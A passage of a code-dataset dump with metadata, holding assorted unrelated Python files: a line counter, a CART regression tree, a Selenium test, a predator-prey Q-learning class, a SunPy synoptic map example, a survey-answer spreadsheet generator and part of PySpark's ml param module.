head.next","sub_path":"2_Add_Two_Numbers.py","file_name":"2_Add_Two_Numbers.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"134480994","text":"# coding=utf-8\nimport os\n\n# 设定根目录\nbasedir = os.path.dirname(__file__)\nfile_lists = []\n# 指定想要统计的文件类型\nwhitelist = ['py']\n\n\n# 遍历文件, 递归遍历文件夹中的所有\ndef getFile(base_dir):\n global file_lists\n for parent, dir_names, filenames in os.walk(base_dir):\n for filename in filenames:\n ext = filename.split('.')[-1]\n # 只统计指定的文件类型,略过一些log和cache文件\n if ext in whitelist:\n file_lists.append(os.path.join(parent, filename))\n\n\n# 统计一个的行数\ndef countLine(fp_name):\n count = 0\n # 把文件做二进制看待,read.\n for file_line in open(fp_name, 'rb').readlines():\n if file_line != '' and file_line != '\\n': # 过滤掉空行\n count += 1\n print(fp_name + '----', count)\n return count\n\n\ndef __start__():\n getFile(basedir)\n total_line = 0\n for file_list in file_lists:\n total_line += countLine(file_list)\n\n print(basedir)\n print('total lines:', total_line)\n\n\nif __name__ == '__main__':\n __start__()\n","sub_path":"V2RaycSpider0825/统计项目代码行数.py","file_name":"统计项目代码行数.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"327557244","text":"#coding=utf-8\nimport numpy as np\n\ndef binary_split_dataset(dataset, feature, value):\n # dataset: numpy array\n left_dataset = dataset[np.nonzero(dataset[:, feature] > value)[0], :]\n right_dataset = dataset[np.nonzero(dataset[:, feature] <= value)[0], :]\n return left_dataset, right_dataset\n\ndef create_leaf(dataset):\n # 计算标签的均值\n return np.mean(dataset[:, -1])\n\ndef calculate_error(dataset):\n # 计算标签与均值的平方误差\n return np.var(dataset[:, -1]) * dataset.shape[0]\n\ndef choose_best_split(dataset, stop_error=0, stop_num=1):\n # 选择最好的划分特征和划分值\n if len(set(dataset[:, -1].T.tolist())) == 1:\n return None, create_leaf(dataset)\n num_features = dataset.shape[1] - 1\n base_error = calculate_error(dataset)\n best_error = np.inf\n best_feature_index = 0\n best_split_value = 0\n for feature_index in range(num_features):\n for split_value in set(dataset[:, feature_index]):\n left_dataset, right_dataset = binary_split_dataset(dataset, feature_index, split_value)\n num_left = left_dataset.shape[0]\n num_right = right_dataset.shape[0]\n if (num_left < stop_num) or (num_right < stop_num):\n continue\n current_error = calculate_error(left_dataset) + calculate_error(right_dataset)\n if current_error < best_error:\n best_feature_index = feature_index\n best_split_value = split_value\n best_error = current_error\n if (base_error - best_error) < stop_error:\n return None, create_leaf(dataset)\n left_dataset, right_dataset = binary_split_dataset(dataset, best_feature_index, best_split_value)\n num_left = left_dataset.shape[0]\n num_right = right_dataset.shape[0]\n if (num_left < stop_num) or (num_right < stop_num):\n return None, create_leaf(dataset)\n return best_feature_index, best_split_value\n\ndef create_tree(dataset, stop_error=0, stop_num=1):\n split_feature, split_value = choose_best_split(dataset, stop_error, stop_num)\n if split_feature == None:\n return split_value\n tree = {}\n tree['split_index'] = split_feature\n tree['split_value'] = split_value\n left_dataset, right_dataset = binary_split_dataset(dataset, split_feature, split_value)\n tree['left'] = create_tree(left_dataset, stop_error, stop_num)\n tree['right'] = create_tree(right_dataset, stop_error, stop_num)\n return tree\n\ndef is_tree(obj):\n return type(obj).__name__ == 'dict'\n\ndef get_num_leafs(tree):\n if is_tree(tree):\n return get_num_leafs(tree['left']) + get_num_leafs(tree['right'])\n else:\n return 1\n\ndef get_tree_depth(tree):\n if is_tree(tree):\n return 1 + max(get_tree_depth(tree['left']), get_tree_depth(tree['right']))\n else:\n return 1\n\ndef get_mean(tree):\n if not is_tree(tree):\n return tree\n if is_tree(tree['left']):\n tree['left'] = get_mean(tree['left'])\n if is_tree(tree['right']):\n tree['right'] = get_mean(tree['right'])\n return (tree['left'] + tree['right']) / 2.0\n\ndef prune(tree, testdata):\n if not is_tree(tree):\n return tree\n num_examples = testdata.shape[0]\n if num_examples == 0:\n return get_mean(tree)\n left_dataset, right_dataset = binary_split_dataset(testdata, tree['split_index'], tree['split_value'])\n if is_tree(tree['left']):\n tree['left'] = prune(tree['left'], left_dataset)\n if is_tree(tree['right']):\n tree['right'] = prune(tree['right'], right_dataset)\n if not is_tree(tree['left']) and not is_tree(tree['right']):\n error_no_merge = np.sum(np.square(left_dataset[:, -1] - tree['left'])) + np.sum(np.square(right_dataset[:, -1] - tree['right']))\n tree_mean = (tree['left'] + tree['right']) / 2.0\n error_merge = np.sum(np.square(testdata[:, -1] - tree_mean))\n if error_merge < error_no_merge:\n return tree_mean\n else:\n return tree\n else:\n return tree\n\ndef regress(tree, feature_vector):\n if not is_tree(tree):\n return tree\n else:\n if feature_vector[tree['split_index']] > tree['split_value']:\n return regress(tree['left'], feature_vector)\n else:\n return regress(tree['right'], feature_vector)","sub_path":"decision_tree/model/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"637233996","text":"from selenium.webdriver import DesiredCapabilities\n\nfrom testcontainers.selenium import BrowserWebDriverContainer\n\n\ndef test_chrome_container():\n chrome = BrowserWebDriverContainer(DesiredCapabilities.CHROME)\n\n with chrome:\n webdriver = chrome.get_driver()\n webdriver.get(\"http://google.com\")\n webdriver.find_element_by_name(\"q\").send_keys(\"Hello\")","sub_path":"tests/test_webdriver_container.py","file_name":"test_webdriver_container.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"53587667","text":"import os\nfrom setuptools import setup\n\nf = open(os.path.join(os.path.dirname(__file__), 'README.md'))\nreadme = f.read()\nf.close()\n\nsetup(\n name='django-ajaximage-kernel72',\n version='0.2.7',\n description='Upload images and files via ajax. Images are optionally resized.',\n long_description=readme,\n author=\"kernel72\",\n author_email='bradley.griffiths@gmail.com',\n url='https://github.com/bradleyg/django-ajaximage-kernel72',\n packages=['ajaximage'],\n include_package_data=True,\n install_requires=['Django', 'Pillow',],\n zip_safe=False\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"420482791","text":"from tkinter import *\n\nfont1 = (\"Helvetica\", 12)\n\nroot = Tk()\nroot.geometry('100x50+20+20')\n\nmainframe = Frame(root)\nmainframe.grid(column=1000, row=1000, sticky=(N, W, E, S))\nmainframe.columnconfigure(0, weight=1)\nmainframe.rowconfigure(0, weight=1)\n\nbest = StringVar()\nbest.set('start')\nlabel1 = Label(mainframe, textvariable=best,\n bg='#321000', fg='#000fff000', font=font1)\nlabel1.grid()\n\n\ndef run(n=0, master=mainframe):\n best.set('test # %d' % (n))\n n += 1\n if n <= 10:\n mainframe.after(1000, run, n, master)\n\n\nbut1 = Button(text=\"RUN\", command=run)\nbut1.grid()\nroot.mainloop()\n","sub_path":"tkinter-tuts/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"393914571","text":"import os\n\nPROJECT_PATH = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\n\nUSER_HOME = os.path.expanduser(\"~\")\n\nSHADOWRAY_CONFIG_FOLDER = os.path.join(PROJECT_PATH, \".shadowray\")\n\nV2RAY_FOLDER = os.path.join(SHADOWRAY_CONFIG_FOLDER, \"v2ray\")\nV2RAY_BINARY = os.path.join(V2RAY_FOLDER, \"v2ray\")\nV2CTL_BINARY = os.path.join(V2RAY_FOLDER, \"v2ctl\")\nEXECUTE_ARGS = \"-config=stdin:\"\n\nRESOURCES_FOLDER = os.path.join(SHADOWRAY_CONFIG_FOLDER, \"resources\")\nSUBSCRIBE_FILE = os.path.join(RESOURCES_FOLDER, \"subscribes.json\")\nSERVER_FILE = os.path.join(RESOURCES_FOLDER, \"servers.json\")\n\nPROJECT_CONFIG_FILE = os.path.join(SHADOWRAY_CONFIG_FOLDER, \"config.json\")\n\nSERVER_KEY_FROM_ORIGINAL = \"servers_original\"\nSERVER_KEY_FROM_SUBSCRIBE = \"servers_subscribe\"\n\nV2RAY_PID_FILE = os.path.join(SHADOWRAY_CONFIG_FOLDER, \"pid\")\n\nCONFIG_STREAM_FILE = os.path.join(SHADOWRAY_CONFIG_FOLDER, \"stdin\")\n","sub_path":"shadowray/config/v2ray.py","file_name":"v2ray.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"3429330","text":"try:\n n = int(input(\"enter the size of list\\n\"))\n list = [int(input()) for i in range(n)]\n dict={}\n for each in list:\n if each not in dict:\n dict[each]=1\n else:\n dict[each]+=1\n print(dict)\nexcept Exception as e:\n print(e)","sub_path":"count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"363659969","text":"import Predator\n\nfrom AnimatObject import Animat\nfrom Food import Food\nfrom Obstacle import Obstacle\nimport qlearn_mod_random as qlearn\nfrom Actions import Actions\nimport numpy as np\n\nclass Prey(Animat):\n \n dictionaryOfPreys= dict()\n \n def __init__(self,width,height,color,image,grid):\n Animat.__init__(self, width, height, color,image, grid)\n self.ai = qlearn.QLearn(actions=range(Actions.directions),alpha=0.1, gamma=0.9, epsilon=0.1)\n self.eaten = 0 \n Prey.dictionaryOfPreys[(self.gridX,self.gridY)] = self \n \n def getPredatorPositionsInNeighborhood(self):\n neighborGrids = self.getNeighborGridCoordinates()\n predatorPositionsInNeighborhood = []\n for neighborGrid in neighborGrids:\n if(Predator.Predator.dictionaryOfPredators.has_key(neighborGrid)):\n predatorPositionsInNeighborhood.append(neighborGrid)\n return predatorPositionsInNeighborhood\n \n def getNeighborGridCoordinates(self):\n positionsOfNeighborGrids = []\n lookAroundDistance = 2 \n for i in range (-lookAroundDistance,lookAroundDistance + 1):\n for j in range (-lookAroundDistance,lookAroundDistance + 1):\n if((abs(i) + abs(j) <= lookAroundDistance) and (not (i==0 and j==0))):\n neighborPosition = (self.gridX + i, self.gridY + j)\n if(self.isWithinBounds(neighborPosition[0],neighborPosition[1])):\n positionsOfNeighborGrids.append(neighborPosition)\n return positionsOfNeighborGrids\n \n def update(self):\n return\n #Override this for all subclasses\n# state = self.calculateState()\n# reward = -20\n# \n# #Check if the animat is on a food Intensity gradient \n# if(self.rewardForProximityToFood()):\n# reward += -1*(1 - self.rewardForProximityToFood())\n# \n# if(self.hasPredatorInNeighborhood()):\n# reward += -40\n# \n# if (self.gridX,self.gridY) in self.previousPositionTuples:\n# reward += -20\n# \n# #Check if the animat has been eaten by any of the predators \n# if(self.isBeingEatenByPredator()):\n# self.eaten += 1\n# reward = -200\n# if self.lastState is not None:\n# self.ai.learn(self.lastState,self.lastAction,reward,state)\n# \n# #Since the prey will be re-spawned, reset the last state\n# self.lastState = None\n# self.respawnAtRandomPosition()\n# return\n# \n# if(self.isEatingFood()):\n# #Remove the food being eaten\n# eatenFood = Food.dictionaryOfFoodObjects.pop((self.gridX,self.gridY))\n# eatenFood.gotEaten()\n# eatenFoodCell = self.grid.cellMatrix[eatenFood.gridX][eatenFood.gridY]\n# eatenFoodCell.foodIntensity = 0\n# eatenFood = None\n# self.fed += 1\n# reward += 100\n# \n# #Reward for being in between offspring and predator\n# reward += self.rewardForProtection() \n# \n# if(self.lastState is not None):\n# self.ai.learn(self.lastState,self.lastAction,reward,state)\n# \n# state = self.calculateState()\n# action = self.ai.chooseAction(state)\n# self.lastState = state\n# self.lastAction = action\n# self.setPrevious2Positions()\n# self.performAction(action)\n# self.drawGameObjectAtCurrentPosition() \n \n\n def hasPredatorInNeighborhood(self):\n predatorsInNeighborHood = self.getPredatorPositionsInNeighborhood()\n if(len(predatorsInNeighborHood) > 0):\n return True\n return False\n \n def isBeingEatenByPredator(self):\n return self.isCellOnAnyPredator((self.gridX,self.gridY))\n \n def calculateState(self):\n def stateValueForNeighbor(neighborCellCoordinates):\n currentCellState = ()\n if self.isCellOnAnyPredator(neighborCellCoordinates):\n currentCellState += (4,)\n if self.isCellOnAnyFood(neighborCellCoordinates):\n currentCellState += (3,)\n if self.isCellOnAnyObstacle(neighborCellCoordinates):\n currentCellState = (2,) \n if self.hasNoObjectOnCell(neighborCellCoordinates):\n currentCellState = (0,)\n \n if bool(self.getCellFoodIntensity(neighborCellCoordinates)):\n currentCellState += (self.getCellFoodIntensity(neighborCellCoordinates),)\n \n return currentCellState\n \n return tuple([stateValueForNeighbor(neighborCellCoordinates) for neighborCellCoordinates in self.getNeighborGridCoordinates()])\n\n def getCellFoodIntensity(self,neighborCellCoordinates):\n cell = self.grid.cellMatrix[neighborCellCoordinates[0]][neighborCellCoordinates[1]]\n return cell.foodIntensity\n \n def hasNoObjectOnCell(self,gridCoordinatesOfCell):\n return (not (self.isCellOnAnyFood(gridCoordinatesOfCell))) and (not(self.isCellOnAnyObstacle(gridCoordinatesOfCell))) and (not(self.isCellOnAnyPredator(gridCoordinatesOfCell))) and not(self.getCellFoodIntensity(gridCoordinatesOfCell))\n \n def isEatingFood(self):\n return self.isCellOnAnyFood((self.gridX,self.gridY))\n \n def isCellOnAnyPredator(self,gridCoordinatesOfCell):\n predatorKeys = Predator.Predator.dictionaryOfPredators.keys() #Keys are tuples and Values are references to the actual predator object\n for predatorPosition in predatorKeys:\n if(gridCoordinatesOfCell == predatorPosition):\n return True\n return False\n \n def isCellOnAnyFood(self,gridCoordinatesForCell):\n if(Food.dictionaryOfFoodObjects.has_key(gridCoordinatesForCell)): \n return True\n return False\n \n def isCellOnAnyObstacle(self,gridCoordinatesForCell):\n if(Obstacle.dictionaryOfObstacles.has_key(gridCoordinatesForCell)): \n return True\n return False\n \n def move(self, directionX, directionY):\n #Override for subclass\n Animat.move(self, directionX, directionY)\n# oldXPosition = self.gridX\n# oldYPosition = self.gridY \n# nextXPosition = self.gridX + directionX\n# nextYPosition = self.gridY + directionY\n# if(self.isMovementPossible(nextXPosition, nextYPosition)):\n# #If prey is in new position \n# if(not Prey.dictionaryOfPrey.has_key((nextXPosition,nextYPosition))):\n# #Another Prey is not on the next Position, so valid movement\n# Animat.move(self, directionX, directionY)\n# Prey.dictionaryOfPrey.pop((oldXPosition,oldYPosition))\n# Prey.dictionaryOfPrey[(self.gridX,self.gridY)] = self;\n \n def respawnAtRandomPosition(self):\n #Override for subclass\n return\n# oldXPosition = self.gridX\n# oldYPosition = self.gridY\n# \n# randomX = random.randrange(0,self.grid.numberOfColumns)\n# randomY = random.randrange(0,self.grid.numberOfRows)\n# self.setXYPosition(randomX, randomY)\n# \n# Prey.dictionaryOfPrey.pop((oldXPosition,oldYPosition))\n# while Prey.dictionaryOfPrey.has_key((self.gridX,self.gridY)):\n# randomX = random.randrange(0,self.grid.numberOfColumns)\n# randomY = random.randrange(0,self.grid.numberOfRows)\n# self.setXYPosition(randomX, randomY)\n# Prey.dictionaryOfPrey[(self.gridX,self.gridY)] = self \n \n def rewardForProximityToFood(self): \n cell = self.grid.cellMatrix[self.gridX][self.gridY] \n return cell.foodIntensity\n \n def findAngleTo(self,x1,y1):\n pi = np.pi\n x0 = self.gridX\n y0 = self.gridY\n deltaX = x1 - x0\n deltaY = y1 - y0\n if(deltaX == 0):\n deltaX = 0.000000001\n theta = None\n \n slope = deltaY/deltaX\n \n if deltaX >= 0:\n #Q1 or Q4\n if deltaY >= 0:\n #Q1\n theta = np.arctan(slope)\n else:\n #Q4\n theta = 2*pi + np.arctan(slope)\n else:\n #Q2 or Q3\n if deltaY >= 0:\n #Q2\n theta = pi + np.arctan(slope)\n else:\n #Q3\n theta = 3*pi/2 - np.arctan(slope)\n \n return round(theta * 180 / pi)\n \n \n ","sub_path":"src/Prey.py","file_name":"Prey.py","file_ext":"py","file_size_in_byte":8775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"97557645","text":"arr = [64, 25, 10, 22, 11]\n\n# 첫번째 단계 [0,n-1] / n까지 해도 상관없으나 속도가 느리고 의미없다.\nm = 0\nfor i in range(len(arr)):\n m = i\n for j in range(i+1,len(arr)):\n if arr[m] > arr[j]:\n m = j \n arr[i],arr[m] = arr[m],arr[i]\nprint(arr)\n","sub_path":"ssafy_daejeon-master/02 List2/연습장3.py","file_name":"연습장3.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"248144356","text":"\"\"\"\nHMI Daily Synoptic Map\n----------------------\n\nIn this example we load the Daily Synoptic Maps produced by the HMI team. This\ndata is an interesting demonstration of SunPy's Map class as it is not in the\nmore common Helioprojective coordinate system, it is in Heliographic Carrington\ncoordinates and in a non-trivial Cylindrical Equal Area projection.\n\nThis example plots the HMI Daily Synoptic Maps, the file used in this example\ncan be downloaded from\n`here `_\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom astropy.utils.data import download_file\n\nimport sunpy.map\n\n###############################################################################\n# Use astropy to download the file to a temp location.\n\nfilename = download_file(\n 'http://jsoc.stanford.edu/data/hmi/synoptic/hmi.Synoptic_Mr.2191.fits', cache=True)\n\n###############################################################################\n# We read this file in as a Map.\n\nsyn_map = sunpy.map.Map(filename)\n\n###############################################################################\n# There are a couple of oddities with this file, firstly the value of 'CUNIT2':\n\nprint(syn_map.meta['CUNIT2'])\n\n###############################################################################\n# That is not a unit! What this is telling us is that the latitude coordinate\n# is actually the sine of latitude. According to the Thompson (2006) paper,\n# CUNIT2 should be in degrees and CDELT2 should be multiplied by 180/pi. Also\n# the value of CDELT1 has the wrong sign.\n\nsyn_map.meta['CUNIT2'] = 'degree'\nsyn_map.meta['CDELT2'] = 180 / np.pi * syn_map.meta['CDELT2']\nsyn_map.meta['CDELT1'] *= -1\n\n###############################################################################\n# Now we create a SunPy Map from the data and header:\n\n# Set the colorbar properties.\nsyn_map.plot_settings['cmap'] = 'hmimag'\nsyn_map.plot_settings['norm'] = plt.Normalize(-1500, 1500)\n\n###############################################################################\n# Create a figure with the Map's projection:\nfig = plt.figure(figsize=(12, 5))\naxes = plt.subplot(projection=syn_map)\n\n# Plot the image\nim = syn_map.plot()\n\n# Set up the Sine Latitude Grid\nx = axes.coords[0]\ny = axes.coords[1]\n\nx.set_coord_type('longitude', coord_wrap=360.)\ny.set_coord_type('latitude')\n\nx.set_major_formatter('dd')\ny.set_major_formatter('dd')\n\nx.set_axislabel(\"Carrington Longitude [deg]\")\ny.set_axislabel(\"Latitude [deg]\")\n\nx.set_ticks(color='black', exclude_overlapping=True)\ny.set_ticks(color='black', exclude_overlapping=True)\n\n# Hide the grid\naxes.coords.grid(color='black', alpha=0.6, linestyle='dotted', linewidth=0.5)\n\n# Create a colorbar\ncb = plt.colorbar(im, fraction=0.019, pad=0.1)\ncb.set_label(\"LOS Magnetic Field [Gauss]\")\n\n# Another horrible hack to make the ticks draw on the RHS\naxes.set_ylim((1, syn_map.data.shape[0] - 1))\n\nplt.title(\"{} {}-{}\".format(syn_map.meta['content'], syn_map.meta['CAR_ROT'],\n syn_map.meta['CAR_ROT'] + 1))\n\nplt.show()\n","sub_path":"examples/plotting/hmi_synoptic_maps.py","file_name":"hmi_synoptic_maps.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"129459549","text":"import csv\n \nimport cx_Oracle\n \nconnection = cx_Oracle.connect(\"ihor\", \"dreyev\", \"xe\")\n \ncursor = connection.cursor()\n \ncursor.execute(\"\"\"\nSELECT\n\tTRIM(id) as id,\n\tTRIM(name) as name,\n\tTRIM(room_id) as room_id,\n\tTRIM(hostel_id) as hostel_id,\n\tTRIM(computer_id) as computer_id\nFROM student\n\n\"\"\")\n \n \n \nwith open(\"result.csv\", \"w\", newline=\"\") as file:\n\twriter = csv.writer(file)\n\tfor stud_id, stud_name, room_id, hostel_id, computer_id in cursor:\n \n\n \n \twriter.writerow([stud_id, stud_name, room_id, hostel_id, computer_id])\n\n \n \ncursor.close()\n","sub_path":"km52/Dreiev_Ihor/csv_export.py","file_name":"csv_export.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"443650596","text":"# -*- encoding: utf-8 -*-\r\n'''\r\n@File : 问卷星随机选择数据存为excel.py\r\n@Time : 2020/03/09 16:47:23\r\n@Author : Zhang tao \r\n@Version : 1.0\r\n@Desc : 问卷星随机选择数据存为excel.py\r\n'''\r\n\r\n\r\ndef getData():\r\n data = {}\r\n from pyquery import PyQuery as pq\r\n html = pq('https://www.wjx.cn/m/59597032.aspx')\r\n for line in html('.field.ui-field-contain').items():\r\n q = line('.field-label')\r\n qu = q.text()\r\n ans = [t.text for t in line.find('.label')]\r\n data[qu] = ans\r\n return data\r\n\r\n\r\ndef writeExcel(data,num):\r\n import xlwt\r\n import random\r\n workbook = xlwt.Workbook(encoding='utf-8')\r\n worksheet = workbook.add_sheet('调查', cell_overwrite_ok=True)\r\n le = len(data)\r\n keys = list(data.keys())\r\n for l in range(le):\r\n worksheet.write(0, l, keys[l])\r\n i = 1\r\n va = [list(v) for v in data.values()]\r\n # print(va, len(va))\r\n while i <= num:\r\n [random.shuffle(v) for v in va]\r\n myV = []\r\n myV += [va[c][0] for c in range(5)]\r\n rt = random.randint(1, 4)\r\n myV += [','.join(random.sample(va[5], rt))]\r\n myV += [va[c][0] for c in range(6, 9)]\r\n myV += [','.join(random.sample(va[9], rt))]\r\n myV += [va[c][0] for c in range(10, 19)]\r\n myV += [','.join(random.sample(va[19], rt))]\r\n myV += [va[c][0] for c in range(20, 33)]\r\n myV += [','.join(random.sample(va[t], rt)) for t in range(33, 35)]\r\n for l in range(le):\r\n worksheet.write(i, l, myV[l])\r\n i += 1\r\n workbook.save('D:\\excel.xls')\r\n print('finished!')\r\n\r\n\r\ndata = getData()\r\n# print(data)\r\nwriteExcel(data,2000)\r\n","sub_path":"leetcode+牛客/问卷星随机选择数据存为excel.py","file_name":"问卷星随机选择数据存为excel.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"541756370","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport array\nfrom abc import ABCMeta\nimport copy\nfrom typing import (\n Any,\n Callable,\n Generic,\n List,\n Optional,\n overload,\n TypeVar,\n Union,\n TYPE_CHECKING,\n)\n\nimport numpy as np\nfrom py4j.java_gateway import JavaObject\n\nfrom pyspark.ml.linalg import DenseVector, Vector, Matrix\nfrom pyspark.ml.util import Identifiable\n\n\nif TYPE_CHECKING:\n from pyspark.ml._typing import ParamMap\n\n__all__ = [\"Param\", \"Params\", \"TypeConverters\"]\n\nT = TypeVar(\"T\")\nP = TypeVar(\"P\", bound=\"Params\")\n\n\nclass Param(Generic[T]):\n \"\"\"\n A param with self-contained documentation.\n\n .. versionadded:: 1.3.0\n \"\"\"\n\n def __init__(\n self,\n parent: Identifiable,\n name: str,\n doc: str,\n typeConverter: Optional[Callable[[Any], T]] = None,\n ):\n if not isinstance(parent, Identifiable):\n raise TypeError(\"Parent must be an Identifiable but got type %s.\" % type(parent))\n self.parent = parent.uid\n self.name = str(name)\n self.doc = str(doc)\n self.typeConverter = TypeConverters.identity if typeConverter is None else typeConverter\n\n def _copy_new_parent(self, parent: Any) -> \"Param\":\n \"\"\"Copy the current param to a new parent, must be a dummy param.\"\"\"\n if self.parent == \"undefined\":\n param = copy.copy(self)\n param.parent = parent.uid\n return param\n else:\n raise ValueError(\"Cannot copy from non-dummy parent %s.\" % parent)\n\n def __str__(self) -> str:\n return str(self.parent) + \"__\" + self.name\n\n def __repr__(self) -> str:\n return \"Param(parent=%r, name=%r, doc=%r)\" % (self.parent, self.name, self.doc)\n\n def __hash__(self) -> int:\n return hash(str(self))\n\n def __eq__(self, other: Any) -> bool:\n if isinstance(other, Param):\n return self.parent == other.parent and self.name == other.name\n else:\n return False\n\n\nclass TypeConverters:\n \"\"\"\n Factory methods for common type conversion functions for `Param.typeConverter`.\n\n .. versionadded:: 2.0.0\n \"\"\"\n\n @staticmethod\n def _is_numeric(value: Any) -> bool:\n vtype = type(value)\n return vtype in [int, float, np.float64, np.int64] or vtype.__name__ == \"long\"\n\n @staticmethod\n def _is_integer(value: Any) -> bool:\n return TypeConverters._is_numeric(value) and float(value).is_integer()\n\n @staticmethod\n def _can_convert_to_list(value: Any) -> bool:\n vtype = type(value)\n return vtype in [list, np.ndarray, tuple, range, array.array] or isinstance(value, Vector)\n\n @staticmethod\n def _can_convert_to_string(value: Any) -> bool:\n vtype = type(value)\n return isinstance(value, str) or vtype in [np.unicode_, np.string_, np.str_]\n\n @staticmethod\n def identity(value: \"T\") -> \"T\":\n \"\"\"\n Dummy converter that just returns value.\n \"\"\"\n return value\n\n @staticmethod\n def toList(value: Any) -> List:\n \"\"\"\n Convert a value to a list, if possible.\n \"\"\"\n if type(value) == list:\n return value\n elif type(value) in [np.ndarray, tuple, range, array.array]:\n return list(value)\n elif isinstance(value, Vector):\n return list(value.toArray())\n else:\n raise TypeError(\"Could not convert %s to list\" % value)\n\n @staticmethod\n def toListFloat(value: Any) -> List[float]:\n \"\"\"\n Convert a value to list of floats, if possible.\n \"\"\"\n if TypeConverters._can_convert_to_list(value):\n value = TypeConverters.toList(value)\n if all(map(lambda v: TypeConverters._is_numeric(v), value)):\n return [float(v) for v in value]\n raise TypeError(\"Could not convert %s to list of floats\" % value)\n\n @staticmethod\n def toListListFloat(value: Any) -> List[List[float]]:\n \"\"\"\n Convert a value to list of list of floats, if possible.\n \"\"\"\n if TypeConverters._can_convert_to_list(value):\n value = TypeConverters.toList(value)\n return [TypeConverters.toListFloat(v) for v in value]\n raise TypeError(\"Could not convert %s to list of list of floats\" % value)\n\n @staticmethod\n def toListInt(value: Any) -> List[int]:\n \"\"\"\n Convert a value to list of ints, if possible.\n \"\"\"\n if TypeConverters._can_convert_to_list(value):\n value = TypeConverters.toList(value)\n if all(map(lambda v: TypeConverters._is_integer(v), value)):\n return [int(v) for v in value]\n raise TypeError(\"Could not convert %s to list of ints\" % value)\n\n @staticmethod\n def toListString(value: Any) -> List[str]:\n \"\"\"\n Convert a value to list of strings, if possible.\n \"\"\"\n if TypeConverters._can_convert_to_list(value):\n value = TypeConverters.toList(value)\n if all(map(lambda v: TypeConverters._can_convert_to_string(v), value)):\n return [TypeConverters.toString(v) for v in value]\n raise TypeError(\"Could not convert %s to list of strings\" % value)\n\n @staticmethod\n def toVector(value: Any) -> Vector:\n \"\"\"\n Convert a value to a MLlib Vector, if possible.\n \"\"\"\n if isinstance(value, Vector):\n return value\n elif TypeConverters._can_convert_to_list(value):\n value = TypeConverters.toList(value)\n if all(map(lambda v: TypeConverters._is_numeric(v), value)):\n return DenseVector(value)\n raise TypeError(\"Could not convert %s to vector\" % value)\n\n @staticmethod\n def toMatrix(value: Any) -> Matrix:\n \"\"\"\n Convert a value to a MLlib Matrix, if possible.\n \"\"\"\n if isinstance(value, Matrix):\n return value\n raise TypeError(\"Could not convert %s to matrix\" % value)\n\n @staticmethod\n def toFloat(value: Any) -> float:\n \"\"\"\n Convert a value to a float, if possible.\n \"\"\"\n if TypeConverters._is_numeric(value):\n return float(value)\n else:\n raise TypeError(\"Could not convert %s to float\" % value)\n\n @staticmethod\n def toInt(value: Any) -> int:\n \"\"\"\n Convert a value to an int, if possible.\n \"\"\"\n if TypeConverters._is_integer(value):\n return int(value)\n else:\n raise TypeError(\"Could not convert %s to int\" % value)\n\n @staticmethod\n def toString(value: Any) -> str:\n \"\"\"\n Convert a value to a string, if possible.\n \"\"\"\n if isinstance(value, str):\n return value\n elif type(value) in [np.string_, np.str_, np.unicode_]:\n return str(value)\n else:\n raise TypeError(\"Could not convert %s to string type\" % type(value))\n\n @staticmethod\n def toBoolean(value: Any) -> bool:\n \"\"\"\n Convert a value to a boolean, if possible.\n \"\"\"\n if type(value) == bool:\n return value\n else:\n raise TypeError(\"Boolean Param requires value of type bool. Found %s.\" % type(value))\n\n\nclass Params(Identifiable, metaclass=ABCMeta):\n \"\"\"\n Components that take parameters. This also provides an internal\n param map to store parameter values attached to the instance.\n\n .. versionadded:: 1.3.0\n \"\"\"\n\n def __init__(self) -> None:\n super(Params, self).__init__()\n #: internal param map for user-supplied values param map\n self._paramMap: \"ParamMap\" = {}\n\n #: internal param map for default values\n self._defaultParamMap: \"ParamMap\" = {}\n\n #: value returned by :py:func:`params`\n self._params: Optional[List[Param]] = None\n\n # Copy the params from the class to the object\n self._copy_params()\n\n def _copy_params(self) -> None:\n \"\"\"\n Copy all params defined on the class to current object.\n \"\"\"\n cls = type(self)\n src_name_attrs = [(x, getattr(cls, x)) for x in dir(cls)]\n src_params = list(filter(lambda nameAttr: isinstance(nameAttr[1], Param), src_name_attrs))\n for name, param 